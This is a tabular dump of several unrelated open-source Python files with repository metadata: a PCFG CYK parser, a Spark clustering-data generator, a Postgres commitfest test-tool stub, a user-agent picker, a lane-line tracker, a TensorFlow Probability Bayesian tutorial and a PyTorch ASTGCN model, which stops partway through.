hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33c9781fcf45373b7d579f4efc46dbb1d61f2088 | 2,781 | py | Python | nlppcfg.py | mrlongzhang/classicnlp | 99b8e7a103c386d8950536eae45a1fa7291968df | [
"MIT"
] | null | null | null | nlppcfg.py | mrlongzhang/classicnlp | 99b8e7a103c386d8950536eae45a1fa7291968df | [
"MIT"
] | null | null | null | nlppcfg.py | mrlongzhang/classicnlp | 99b8e7a103c386d8950536eae45a1fa7291968df | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
A Probabiltics Context Free Grammer (PCFG) Parser using Python.
This code implemented a weighted graph search
@author: Zhang Long
"""
import codecs
from collections import defaultdict
import math
f_grammer=".\\test\\08-grammar.txt"
nonterm=[]
preterm=defaultdict(list)
grammer_file=codecs.open(f_grammer, 'r','utf-8')
index = 0
for rule in grammer_file:
words = rule.split('\t')
lhs = words[0]
rhs = words[1]
prob = float(words[2])
rhs_symbols=rhs.split(' ')
if len(rhs_symbols) == 1:
preterm[rhs].append([lhs, math.log(prob)])
else:
nonterm.insert(index,[lhs, rhs_symbols[0], rhs_symbols[1],math.log(prob)])
# add pre-terminals: initialise the bottom level of the CYK chart with the
# log-probability of each pre-terminal symbol covering each input word
f_text=".\\test\\08-input.txt"
text_file=codecs.open(f_text, 'r', 'utf-8')
# init best score with lowest level; chart keys are strings "SYM i j"
# (symbol covering the half-open span [i, j) of the sentence)
best_score=defaultdict(lambda: float('-inf'))
best_edge={}
for line in text_file:
    words = line.split(' ')
    for i in range(len(words)):
        word = words[i].strip()
        for item in (preterm[word]):
            lhs = item[0]
            log_prob = item[1]
            ibs = lhs + ' ' + str(i) + ' ' + str(i+1)
            best_score[ibs] = (log_prob)
text_file.close()
#cyk, calculate the rest levels
text_file=codecs.open(f_text,'r','utf-8')
# NOTE(review): the file is reopened here but never read again; the CYK pass
# below reuses `words` left over from the last line of the previous loop —
# confirm the input file is expected to contain exactly one sentence.
my_lp = float('-inf')
for j in range(2, len(words)+1):          # right edge of the span
    for i in range(j-2, -1, -1):          # left edge of the span
        for k in range(i+1, j):           # split point between the two children
            # rules in grammer table: try every binary rule sym -> lsym rsym
            for nrul in range(len(nonterm)):
                sym=nonterm[nrul][0]
                lsym=nonterm[nrul][1]
                rsym=nonterm[nrul][2]
                logprob =nonterm[nrul][3]
                ilsym = lsym +' ' + str(i) + ' ' + str(k)
                irsym = rsym +' ' + str(k) + ' ' + str(j)
                # combine the children only if both sub-spans were derivable
                if best_score[ilsym] > float('-inf') and best_score[irsym] > float('-inf'):
                    my_lp = best_score[ilsym] + best_score[irsym] + logprob
                    isymi = sym + ' ' + str(i) + ' ' + str(j)
                    # keep the highest-scoring derivation and its back-pointer
                    if(my_lp > best_score[isymi]):
                        best_score[isymi] = my_lp
                        best_edge[isymi] = [ilsym,irsym]
def Print(sym, best_edge, words):
    """Recursively render the parse tree rooted at `sym` as an S-expression.

    Args:
        sym: chart key of the form "SYMBOL i j" (symbol covering span [i, j)).
        best_edge: dict mapping a chart key to its two child chart keys.
        words: the tokenized input sentence.

    Returns:
        str: bracketed tree, e.g. "(S (NP dogs) (VP run))".
    """
    symp = sym.split(' ')[0]
    if sym in best_edge:
        # internal node: recurse into the left and right children
        return "(" + symp + " " \
            + Print(best_edge[sym][0], best_edge, words) + " " + Print(best_edge[sym][1], best_edge, words) \
            + ")"
    else:
        # leaf (pre-terminal): emit the bare symbol and the covered word.
        # Bug fix: the original returned the full chart key `sym`
        # ("NP 0 1 word") instead of the bare symbol `symp`, which it
        # computed but never used.
        i = sym.split(' ')[1]
        return "(" + symp + " " + words[int(i)] + ")"
# Print the best parse tree spanning the whole sentence.
# NOTE(review): assumes the input sentence has exactly 7 tokens — confirm
# against the test input file.
print(Print('S 0 7',best_edge,words))
def main():
    """Placeholder entry point; all parsing work runs at import time above."""
    pass
# Any code you like
if __name__ == '__main__':
main() | 30.56044 | 107 | 0.51708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 482 | 0.173319 |
33c9c1f3e9820356f08403598edffbaf83060a2e | 2,876 | py | Python | generator.py | elieahd/data-analytics-kmeans | df44da132cf0de00d870b8865781f4fd78113cfa | [
"MIT"
] | 2 | 2020-10-09T20:13:00.000Z | 2021-06-06T09:18:33.000Z | generator.py | elieahd/data-analytics-kmeans | df44da132cf0de00d870b8865781f4fd78113cfa | [
"MIT"
] | null | null | null | generator.py | elieahd/data-analytics-kmeans | df44da132cf0de00d870b8865781f4fd78113cfa | [
"MIT"
] | 2 | 2018-06-06T08:33:03.000Z | 2018-06-06T09:00:47.000Z | # spark-submit generator.py out 9 3 2 10
# imports
import sys
import random
import numpy
from pyspark import SparkContext
from pyspark.mllib.random import RandomRDDs
# constants
# bounds and granularity of the randomly drawn per-cluster mean coordinates
MIN_MEAN_VALUE = 0
MAX_MEAN_VALUE = 100
STEPS = 0.1
# methods
def point_values(means_value, normal_value, std, cluster, dimension):
    """Build one CSV row for a generated data point.

    Each of the `dimension` coordinates is `mean + normal_draw * std`; the
    cluster label is appended as the final column.

    :param means_value: per-dimension means of the point's cluster
    :param normal_value: per-dimension standard-normal draws
    :param std: standard deviation applied to every dimension
    :param cluster: cluster label, appended as the last field
    :param dimension: number of coordinates to emit
    :return: comma-separated string "v1,...,vd,cluster"
    """
    # str.join replaces the original quadratic string-concatenation loop;
    # the trailing "," + cluster keeps the exact original output format.
    coords = [str(means_value[d] + normal_value[d] * std) for d in range(dimension)]
    return ",".join(coords) + "," + str(cluster)
def write_into_csv(file_name, rdd):
    """Collect the RDD onto the driver and dump it, one row per line.

    :param file_name: path of the CSV file to create/overwrite
    :param rdd: Spark RDD of string rows
    """
    rows = rdd.collect()
    # NOTE: 'wb' with str rows matches this file's Python 2 conventions
    with open(file_name, 'wb') as out_file:
        for row in rows:
            out_file.write(row)
            out_file.write('\n')
# main code
# Usage check: spark-submit supplies argv[0]; the script needs 5 more args.
if len(sys.argv) != 6:
    print("6 arguments are needed :")
    print(" * file name of the code generator.py")
    print(" * file name to be generated e.g. output")
    print(" * number of points to be generated e.g. 9")
    print(" * number of clusters e.g. 3")
    print(" * dimension of the data e.g. 2")
    print(" * standard deviation e.g. 10\n")
    print("Try executing the following command : spark-submit generator.py out 9 3 2 10")
    exit(0)
# inputs
file_name = sys.argv[1] + '.csv' # file name to be generated
points = int(sys.argv[2]) # number of points to be generated
count_cluster = int(sys.argv[3]) # number of clusters
dimension = int(sys.argv[4]) # dimension of the data
std = int(sys.argv[5]) # standard deviation
noise_points = points * 2 # number of noise points to be generated / double the number of points
sc = SparkContext("local", "generator") # spark context
# array of the clusters : clusters = [0, 1, 2]
clusters = sc.parallelize(range(0, count_cluster))
# random means of each cluster : means_cluster = [ (0, [0.6, 80.9]), (1, [57.8, 20.2]), (2, [15.6, 49.9]) ]
means_cluster = clusters.map(lambda cluster : (cluster, random.sample(numpy.arange(MIN_MEAN_VALUE, MAX_MEAN_VALUE, STEPS), dimension)))
# creating random vector using normalVectorRDD
# NOTE: the `1L` long literal here (and the tuple-unpacking lambda below)
# make this file Python 2 only.
random_values_vector = RandomRDDs.normalVectorRDD(sc, numRows = points, numCols = dimension, numPartitions = count_cluster, seed = 1L)
# assiging a random cluster for each point
cluster_normal_values_vector = random_values_vector.map(lambda point : (random.randint(0, count_cluster - 1), point.tolist()))
# generate a value depending of the mean of the cluster, standard deviation and the normal value
points_value_vector = cluster_normal_values_vector.join(means_cluster).map(lambda (cluster, (normal_value, means_value)): (point_values(means_value, normal_value, std, cluster, dimension)))
# printing result in console
# print(points_value_vector.collect())
# writing points value in a 1 csv file
# write_into_csv(file_name, points_value_vector);
# saving rdd using saveAsTextFile
points_value_vector.saveAsTextFile(file_name) | 37.842105 | 189 | 0.705494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,189 | 0.413421 |
33cab9736c2b33f9dc7ebf54dc2179461c98e762 | 1,263 | py | Python | testtool.py | andreasscherbaum/pg_commitfest_testtool | 4e40ef441401faddc34861a92f41a9ca60c7560c | [
"BSD-3-Clause"
] | 1 | 2017-10-26T13:52:53.000Z | 2017-10-26T13:52:53.000Z | testtool.py | andreasscherbaum/pg_commitfest_testtool | 4e40ef441401faddc34861a92f41a9ca60c7560c | [
"BSD-3-Clause"
] | null | null | null | testtool.py | andreasscherbaum/pg_commitfest_testtool | 4e40ef441401faddc34861a92f41a9ca60c7560c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
#
# test tool for PostgreSQL Commitfest website
#
# written by: Andreas Scherbaum <ads@pgug.de>
#
import re
import os
import sys
import logging
import tempfile
import atexit
import shutil
import time
import subprocess
from subprocess import Popen
import socket
import sqlite3
import datetime
from time import gmtime, localtime, strftime
# config functions
from config import Config
import copy
# start with 'info', can be overriden by '-q' later on
logging.basicConfig(level = logging.INFO,
                    format = '%(levelname)s: %(message)s')
# exit_handler()
#
# exit handler, called upon exit of the script
# main job: remove the temp directory
#
# parameters:
#  none
# return:
#  none
def exit_handler():
    """Cleanup hook run when the interpreter exits."""
    # do something in the end ...
    # NOTE(review): currently a no-op, despite the "remove the temp
    # directory" comment above — confirm whether cleanup was intended here.
    pass
# register exit handler
atexit.register(exit_handler)
#######################################################################
# main code
# config todo:
# * test technology (Docker, LXC, ...)
# Build and validate the tool configuration from CLI arguments and the
# config file; build_and_verify_config() also acquires the lockfile.
config = Config()
config.parse_parameters()
config.load_config()
config.build_and_verify_config()
# by now the lockfile is acquired, there is no other instance running
# before starting new jobs, cleanup remaining old ones
# startup
config.cleanup_old_dirs_and_files()
# main mode
| 16.402597 | 71 | 0.699129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 680 | 0.538401 |
33ccafc8a5799e67020bb35fde701098ce38149a | 856 | py | Python | coronavirus/common/user_agent.py | StevenHuang2020/WebSpider | 40ab36416e061da3eb98a3174f18f50260b2e2d3 | [
"MIT"
] | null | null | null | coronavirus/common/user_agent.py | StevenHuang2020/WebSpider | 40ab36416e061da3eb98a3174f18f50260b2e2d3 | [
"MIT"
] | null | null | null | coronavirus/common/user_agent.py | StevenHuang2020/WebSpider | 40ab36416e061da3eb98a3174f18f50260b2e2d3 | [
"MIT"
] | null | null | null | import random
from fake_useragent import UserAgent
agent_list = '''Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'''
def random_agent():
headers = agent_list.split('\n')
length = len(headers)
return headers[random.randint(0, length - 1)]
def get_random_agent():
ua = UserAgent(cache=False).random
#print(ua)
return ua
def main():
# agent = get_random_agent()
agent = random_agent()
print('agent=', agent)
if __name__ == "__main__":
main()
| 27.612903 | 137 | 0.682243 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 480 | 0.560748 |
33cd25b6dee7d0d8f2865e1649e038cc3d930d13 | 5,078 | py | Python | line.py | jurlaub/jubilant-fedora | 829432ff4fb8b3972ad5a1a152ecf6f1f7e94f9b | [
"MIT"
] | null | null | null | line.py | jurlaub/jubilant-fedora | 829432ff4fb8b3972ad5a1a152ecf6f1f7e94f9b | [
"MIT"
] | null | null | null | line.py | jurlaub/jubilant-fedora | 829432ff4fb8b3972ad5a1a152ecf6f1f7e94f9b | [
"MIT"
] | null | null | null |
import numpy as np
from collections import deque
QLEN = 8  # history window length for the smoothing deques


class Line(object):
    """Tracks a single lane line across frames (from "Tips and Tricks for
    the Project", lesson 2).

    Keeps bounded histories (deques of length QLEN) of fitted polynomials
    and x positions so per-frame detections can be smoothed.
    """

    def __init__(self, yp=None, xp=None):
        # meters-per-pixel conversion factors in the y and x directions
        self.ym_per_pix = yp
        self.xm_per_pix = xp
        # was the line detected in the last iteration?
        self.detected = False
        # x values of the last n fits of the line (bounded by maxlen=QLEN)
        self.recent_xfitted = deque(maxlen=QLEN)
        # average x values of the fitted line over the last n iterations
        self.bestx = None
        # polynomial coefficients averaged over the last n iterations
        self.best_fit = None
        self.best_fitQ = deque(maxlen=QLEN)
        # difference in fit coefficients between last and new fits
        self.diffs = np.array([0, 0, 0], dtype='float')
        self.diffs_prev = np.array([0, 0, 0], dtype='float')
        # polynomial coefficients for the most recent fit
        self.current_fit = [np.array([False])]
        # radius of curvature of the line (meters)
        self.radius_of_curvature = None
        # distance in meters of line from edge
        self.line_base_pos = None
        # x/y values for detected line pixels
        self.allx = None
        self.ally = None
        # most recent fitted x values evaluated over the frame height
        self.line_fitx = None

    def add_all_pixels(self, ax, ay, warp_shape):
        """Store the detected pixel coordinates and fit a polynomial.

        Args:
            ax: x coordinates of the candidate line pixels.
            ay: y coordinates of the candidate line pixels.
            warp_shape: (height, width) of the warped frame.
        """
        self.allx = ax
        self.ally = ay
        if (len(self.ally) == 0) or (len(self.allx) == 0):
            # nothing detected this frame; previous fit values stay staged
            self.detected = False
        else:
            self._fit_line_polynomial(warp_shape)

    def use_starting_values(self):
        """Seed the histories with the current fit.

        Starting values are used for the first frame and to realign the
        values when a detected position goes off track.
        """
        self.detected = True
        self.recent_xfitted.append(self.line_fitx)
        self.bestx = self.line_fitx
        self.best_fit = self.current_fit
        self.best_fitQ.append(self.current_fit)

    def use_staged_values(self):
        """Accept the per-frame fit from _fit_line_polynomial() and update
        the rolling histories and averaged values.
        """
        # The deques were created with maxlen=QLEN, so append() already
        # discards the oldest entry; the original manual popleft() guards
        # were dead code and have been removed.
        self.recent_xfitted.append(self.line_fitx)
        self.bestx = np.mean(self.recent_xfitted, axis=0)
        self.best_fitQ.append(self.current_fit)
        self.best_fit = np.mean(self.best_fitQ, axis=0)
        # coefficient drift across the whole history window...
        oldest = self.best_fitQ[0]
        newest = self.best_fitQ[-1]
        # Bug fix: this was assigned to a new attribute `self.diff` instead
        # of the `self.diffs` declared (and documented) in __init__.
        self.diffs = np.polysub(oldest, newest)
        # ...and between the previous accepted fit and the current one
        self.diffs_prev = np.polysub(self.best_fitQ[-2], self.current_fit)

    def discard_staged_values(self):
        """Reject the per-frame fit: mark the line as not detected."""
        self.detected = False

    def _fit_line_polynomial(self, frame_shape):
        """Fit a 2nd-order polynomial x = f(y) to the stored pixels
        (from lesson 9.4) and stage fit/curvature/position on the instance.
        """
        # --- coefficients of the line in pixel space
        line_fit = np.polyfit(self.ally, self.allx, 2)
        _ploty = np.linspace(0, frame_shape[0] - 1, frame_shape[0])
        try:
            # x points of the line over the full frame height
            line_fitx = line_fit[0]*_ploty**2 + line_fit[1]*_ploty + line_fit[2]
            x_intercept = line_fit[0]*frame_shape[0]**2 + line_fit[1]*frame_shape[0] + line_fit[2]
        except TypeError:
            # fall back to a dummy line if the fit coefficients are unusable
            line_fitx = 1*_ploty**2 + 1*_ploty
            x_intercept = 0
        # --- curvature: refit in meters so the radius has physical units
        y_eval = np.max(_ploty)*self.ym_per_pix
        line_fit_m = np.polyfit(self.ally*self.ym_per_pix, self.allx*self.xm_per_pix, 2)
        radius_curve = np.sqrt(np.power(1 + (2*line_fit_m[0]*y_eval + line_fit_m[1])**2, 3)) / abs(2*line_fit_m[0])
        self.line_base_pos = x_intercept * self.xm_per_pix
        self.current_fit = line_fit
        self.radius_of_curvature = radius_curve
        self.line_fitx = line_fitx
| 35.51049 | 144 | 0.613037 | 5,012 | 0.987003 | 0 | 0 | 0 | 0 | 0 | 0 | 2,012 | 0.396219 |
33cd7255bbba76e2a841f4c023d7958020291128 | 2,730 | py | Python | ex2_graph/tut2_infer_sigma.py | trungnt13/uef_bay1_2018 | 48a0f684eb4d18777d9f03998233774baa0524a8 | [
"MIT"
] | null | null | null | ex2_graph/tut2_infer_sigma.py | trungnt13/uef_bay1_2018 | 48a0f684eb4d18777d9f03998233774baa0524a8 | [
"MIT"
] | 1 | 2018-11-30T16:36:40.000Z | 2018-11-30T16:36:40.000Z | ex2_graph/tut2_infer_sigma.py | trungnt13/uef_bay1_2018 | 48a0f684eb4d18777d9f03998233774baa0524a8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import seaborn as sns
import numpy as np
import tensorflow as tf
tf.enable_eager_execution()
import tensorflow_probability as tfp
from tensorflow_probability import edward2 as ed
tfd = tfp.distributions
# ===========================================================================
# Constant
# ===========================================================================
a = 8            # Gamma shape (prior on the precision)
b = 0.5          # Gamma rate
mu = 0           # known mean of the Gaussian likelihood
n_samples = 100000
# ===========================================================================
# Following the generative procedure
# ===========================================================================
# Step 1: generate the precision Beta
beta_dist = tfd.Gamma(concentration=a, rate=b)
beta = beta_dist.sample(n_samples)
# the prior probability
p_beta_given_a_and_b = beta_dist.prob(beta)
# Step 2: generate the data point
# scale is standard deviation (= 1/sqrt(precision))
x_dist = tfd.Normal(loc=mu, scale=tf.sqrt(1 / beta))
x = x_dist.sample()
# the likelihood
p_x_given_mu_and_beta = x_dist.prob(x)
# ====== plotting the prior ====== #
plt.figure()
sns.distplot(beta.numpy(), bins=120, kde=True)
plt.title(r"Prior distribution: $p(\beta|a=%g, b=%g)$" % (a, b))
# ====== plotting the likelihood ====== #
plt.figure()
sns.distplot(x.numpy(), bins=120, kde=True)
plt.title(r"Likelihood distribution: $p(X|\mu=%g, \sigma=\sqrt{\beta^{-1}})$" % mu)
# ====== plotting the posterior ====== #
# the posterior probability, this is only
# proportionally, not exactly because we omit
# the evidence p(X)
# If we want to calculate p(X), we need to marginalize out
# beta using sum rule:
# p(X) = p(X, beta_1) + p(X, beta_2) + ... + p(X, beta_∞)
# This is not easy
p_beta_given_x = p_x_given_mu_and_beta * p_beta_given_a_and_b
p_beta_given_x = p_beta_given_x / tf.reduce_sum(p_beta_given_x)
# resample the beta grid proportionally to the (unnormalised) posterior
posterior_dist = tfd.Categorical(probs=p_beta_given_x)
beta = beta.numpy()
posterior = []
for i in range(n_samples // 2000):
    idx = posterior_dist.sample(2000).numpy()
    posterior.append(beta[idx])
posterior = np.concatenate(posterior)
plt.figure()
sns.distplot(posterior, bins=120, kde=True)
plt.title(r"Sampled posterior distribution: $p(\beta|X)$")
# ====== plotting the close form solution ====== #
# Gamma is the conjugate prior of the Gaussian precision, so the exact
# posterior is Gamma with the updated parameters below.
a0 = a + n_samples / 2
b0 = b + n_samples / 2 * np.var(x.numpy())
posterior_dist = tfd.Gamma(concentration=a0, rate=b0)
posterior = posterior_dist.sample(n_samples)
plt.figure()
sns.distplot(posterior, bins=120, kde=True)
plt.title(
    r"Closed form solution: $p(\beta|X) \sim Gamma(a=%g, b=%g)$"
    % (a0, b0))
# odin is a third-party helper used here only to save all open figures
from odin import visual as V
V.plot_save('/tmp/tmp.pdf', dpi=200)
33ce3133c0c71236885386e8ce693950822b09d3 | 10,625 | py | Python | torch_geometric_temporal/nn/convolutional/astgcn.py | LFrancesco/pytorch_geometric_temporal | 0964515a6041ce0cceb12e36ed640df22c046b4d | [
"MIT"
] | null | null | null | torch_geometric_temporal/nn/convolutional/astgcn.py | LFrancesco/pytorch_geometric_temporal | 0964515a6041ce0cceb12e36ed640df22c046b4d | [
"MIT"
] | null | null | null | torch_geometric_temporal/nn/convolutional/astgcn.py | LFrancesco/pytorch_geometric_temporal | 0964515a6041ce0cceb12e36ed640df22c046b4d | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch_geometric.transforms import LaplacianLambdaMax
from torch_geometric.data import Data
from .chebconvatt import ChebConvAtt
class Spatial_Attention_layer(nn.Module):
    '''
    compute spatial attention scores
    '''
    def __init__(self, in_channels, num_of_vertices, num_of_timesteps):
        super(Spatial_Attention_layer, self).__init__()
        # learnable projections used to build the (N x N) attention map
        self.W1 = nn.Parameter(torch.FloatTensor(num_of_timesteps))
        self.W2 = nn.Parameter(torch.FloatTensor(in_channels, num_of_timesteps))
        self.W3 = nn.Parameter(torch.FloatTensor(in_channels))
        self.bs = nn.Parameter(torch.FloatTensor(1, num_of_vertices, num_of_vertices))
        self.Vs = nn.Parameter(torch.FloatTensor(num_of_vertices, num_of_vertices))
        self.reset_parameters()

    def reset_parameters(self):
        # Xavier init for matrices, uniform init for vectors/biases
        for p in self.parameters():
            if p.dim() > 1:
                nn.init.xavier_uniform_(p)
            else:
                nn.init.uniform_(p)

    def forward(self, x):
        """
        Making a forward pass of the spatial attention layer.
        B is the batch size. N_nodes is the number of nodes in the graph. F_in is the dimension of input features.
        T_in is the length of input sequence in time.

        Arg types:
            * x (PyTorch Float Tensor) - Node features for T time periods, with shape (B, N_nodes, F_in, T_in).

        Return types:
            * output (PyTorch Float Tensor) - Spatial attention score matrices, with shape (B, N_nodes, N_nodes).
        """
        lhs = torch.matmul(torch.matmul(x, self.W1), self.W2)  # (b,N,F,T)(T)->(b,N,F)(F,T)->(b,N,T)
        rhs = torch.matmul(self.W3, x).transpose(-1, -2)  # (F)(b,N,F,T)->(b,N,T)->(b,T,N)
        product = torch.matmul(lhs, rhs)  # (b,N,T)(b,T,N) -> (B, N, N)
        S = torch.matmul(self.Vs, torch.sigmoid(product + self.bs))  # (N,N)(B, N, N)->(B,N,N)
        # normalise scores over dim 1 so each column forms a distribution
        S_normalized = F.softmax(S, dim=1)
        return S_normalized
class Temporal_Attention_layer(nn.Module):
    # Computes a (T x T) temporal attention map over the input sequence.
    def __init__(self, in_channels, num_of_vertices, num_of_timesteps):
        super(Temporal_Attention_layer, self).__init__()
        # learnable projections used to build the (T x T) attention map
        self.U1 = nn.Parameter(torch.FloatTensor(num_of_vertices))
        self.U2 = nn.Parameter(torch.FloatTensor(in_channels, num_of_vertices))
        self.U3 = nn.Parameter(torch.FloatTensor(in_channels))
        self.be = nn.Parameter(torch.FloatTensor(1, num_of_timesteps, num_of_timesteps))
        self.Ve = nn.Parameter(torch.FloatTensor(num_of_timesteps, num_of_timesteps))
        self.reset_parameters()

    def reset_parameters(self):
        # Xavier init for matrices, uniform init for vectors/biases
        for p in self.parameters():
            if p.dim() > 1:
                nn.init.xavier_uniform_(p)
            else:
                nn.init.uniform_(p)

    def forward(self, x):
        """
        Making a forward pass of the temporal attention layer.
        B is the batch size. N_nodes is the number of nodes in the graph. F_in is the dimension of input features.
        T_in is the length of input sequence in time.

        Arg types:
            * x (PyTorch Float Tensor) - Node features for T time periods, with shape (B, N_nodes, F_in, T_in).

        Return types:
            * output (PyTorch Float Tensor) - Temporal attention score matrices, with shape (B, T_in, T_in).
        """
        _, num_of_vertices, num_of_features, num_of_timesteps = x.shape
        lhs = torch.matmul(torch.matmul(x.permute(0, 3, 2, 1), self.U1), self.U2)
        # x:(B, N, F_in, T) -> (B, T, F_in, N)
        # (B, T, F_in, N)(N) -> (B,T,F_in)
        # (B,T,F_in)(F_in,N)->(B,T,N)
        rhs = torch.matmul(self.U3, x)  # (F)(B,N,F,T)->(B, N, T)
        product = torch.matmul(lhs, rhs)  # (B,T,N)(B,N,T)->(B,T,T)
        E = torch.matmul(self.Ve, torch.sigmoid(product + self.be))  # (B, T, T)
        # normalise scores over dim 1 so each column forms a distribution
        E_normalized = F.softmax(E, dim=1)
        return E_normalized
class ASTGCN_block(nn.Module):
    # One ASTGCN block: temporal attention -> spatial attention ->
    # attention-modulated Chebyshev graph conv -> temporal conv + residual.
    def __init__(self, in_channels, K, nb_chev_filter, nb_time_filter, time_strides, num_of_vertices, num_of_timesteps):
        super(ASTGCN_block, self).__init__()
        self.TAt = Temporal_Attention_layer(in_channels, num_of_vertices, num_of_timesteps)
        self.SAt = Spatial_Attention_layer(in_channels, num_of_vertices, num_of_timesteps)
        # Chebyshev graph convolution modulated by the spatial attention
        self.cheb_conv_SAt = ChebConvAtt(in_channels, nb_chev_filter, K)
        # 1x3 convolution over the time axis (possibly strided)
        self.time_conv = nn.Conv2d(nb_chev_filter, nb_time_filter, kernel_size=(1, 3), stride=(1, time_strides), padding=(0, 1))
        # 1x1 convolution for the residual shortcut
        self.residual_conv = nn.Conv2d(in_channels, nb_time_filter, kernel_size=(1, 1), stride=(1, time_strides))
        self.ln = nn.LayerNorm(nb_time_filter)  # need to put channel to the last dimension
        self.reset_parameters()

    def reset_parameters(self):
        # Xavier init for matrices, uniform init for vectors/biases
        for p in self.parameters():
            if p.dim() > 1:
                nn.init.xavier_uniform_(p)
            else:
                nn.init.uniform_(p)

    def forward(self, x, edge_index):
        """
        Making a forward pass. This is one ASTGCN block.
        B is the batch size. N_nodes is the number of nodes in the graph. F_in is the dimension of input features.
        T_in is the length of input sequence in time. T_out is the length of output sequence in time.
        nb_time_filter is the number of time filters used.

        Arg types:
            * x (PyTorch Float Tensor) - Node features for T time periods, with shape (B, N_nodes, F_in, T_in).
            * edge_index (Tensor): Edge indices, can be an array of a list of Tensor arrays, depending on whether edges change over time.

        Return types:
            * output (PyTorch Float Tensor) - Hidden state tensor for all nodes, with shape (B, N_nodes, nb_time_filter, T_out).
        """
        batch_size, num_of_vertices, num_of_features, num_of_timesteps = x.shape
        # TAt: reweight the time steps with the temporal attention scores
        temporal_At = self.TAt(x)  # (b, T, T)
        x_TAt = torch.matmul(x.reshape(batch_size, -1, num_of_timesteps), temporal_At).reshape(batch_size, num_of_vertices, num_of_features, num_of_timesteps)
        # SAt: spatial attention on the temporally re-weighted signal
        spatial_At = self.SAt(x_TAt)
        # cheb gcn, applied per time step with the spatial attention
        if not isinstance(edge_index, list):
            # static graph: the Laplacian eigenvalue bound is computed once
            data = Data(edge_index=edge_index, edge_attr=None, num_nodes=num_of_vertices)
            lambda_max = LaplacianLambdaMax()(data).lambda_max
            outputs = []
            for time_step in range(num_of_timesteps):
                outputs.append(torch.unsqueeze(self.cheb_conv_SAt(x[:,:,:,time_step], edge_index, spatial_At, lambda_max = lambda_max), -1))
            spatial_gcn = F.relu(torch.cat(outputs, dim=-1))  # (b,N,F,T)
        else:  # edge_index changes over time
            outputs = []
            for time_step in range(num_of_timesteps):
                # dynamic graph: recompute the bound per time step
                data = Data(edge_index=edge_index[time_step], edge_attr=None, num_nodes=num_of_vertices)
                lambda_max = LaplacianLambdaMax()(data).lambda_max
                outputs.append(torch.unsqueeze(self.cheb_conv_SAt(x=x[:,:,:,time_step], edge_index=edge_index[time_step],
                                                                  spatial_attention=spatial_At,lambda_max=lambda_max), -1))
            spatial_gcn = F.relu(torch.cat(outputs, dim=-1))  # (b,N,F,T)
        # convolution along the time axis
        time_conv_output = self.time_conv(spatial_gcn.permute(0, 2, 1, 3))  # (b,N,F,T)->(b,F,N,T) use kernel size (1,3)->(b,F,N,T)
        # residual shortcut
        x_residual = self.residual_conv(x.permute(0, 2, 1, 3))  # (b,N,F,T)->(b,F,N,T) use kernel size (1,1)->(b,F,N,T)
        x_residual = self.ln(F.relu(x_residual + time_conv_output).permute(0, 3, 2, 1)).permute(0, 2, 3, 1)
        # (b,F,N,T)->(b,T,N,F) -ln-> (b,T,N,F)->(b,N,F,T)
        return x_residual
class ASTGCN(nn.Module):
    r"""An implementation of the Attention Based Spatial-Temporal Graph Convolutional Cell.
    For details see this paper: `"Attention Based Spatial-Temporal Graph Convolutional
    Networks for Traffic Flow Forecasting." <https://ojs.aaai.org/index.php/AAAI/article/view/3881>`_

    Args:
        nb_block (int): Number of ASTGCN blocks in the model.
        in_channels (int): Number of input features.
        K (int): Order of Chebyshev polynomials. Degree is K-1.
        nb_chev_filters (int): Number of Chebyshev filters.
        nb_time_filters (int): Number of time filters.
        time_strides (int): Time strides during temporal convolution.
        num_for_predict (int): Number of predictions to make in the future.
        len_input (int): Length of the input sequence.
        num_of_vertices (int): Number of vertices in the graph.

    Note:
        Edge indices are not a constructor argument; they are passed to
        :meth:`forward`.
    """
    def __init__(self, nb_block, in_channels, K, nb_chev_filter, nb_time_filter, time_strides, num_for_predict, len_input, num_of_vertices):
